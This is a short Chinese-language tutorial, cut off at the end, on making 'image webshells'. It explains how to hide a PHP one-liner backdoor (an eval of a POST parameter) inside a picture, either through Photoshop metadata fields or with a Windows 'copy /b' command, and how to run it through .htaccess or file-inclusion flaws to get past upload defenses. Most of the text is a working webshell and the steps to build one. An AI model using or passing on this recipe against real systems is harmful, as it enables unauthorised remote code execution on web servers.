一、文件内容检测

解析漏洞定义

控制文件是否被当做后端脚本处理

二、图片马绕过

图片马；在图片中包含一句话木马。利用解析漏洞如.htaccess 或文件包含漏洞，对图片马进行解析，执行其中的恶意代码。优势在于可以绕过多种防护机制。

三、图片马制作方法:

# 一句话马示例
<?php @eval($_POST["pass"]);?>

1）使用Photoshop（ps），选择“文件”->“文件简介”，在文档标题或者作者处写入一句话木马。

 

2）使用cmd命令行制作

先准备一张图片（随便截图搞一张就好），然后准备一个一句话马的php文件

# 在window下生成图片木马
copy a.png /b + post.php /a webshell.png

解释：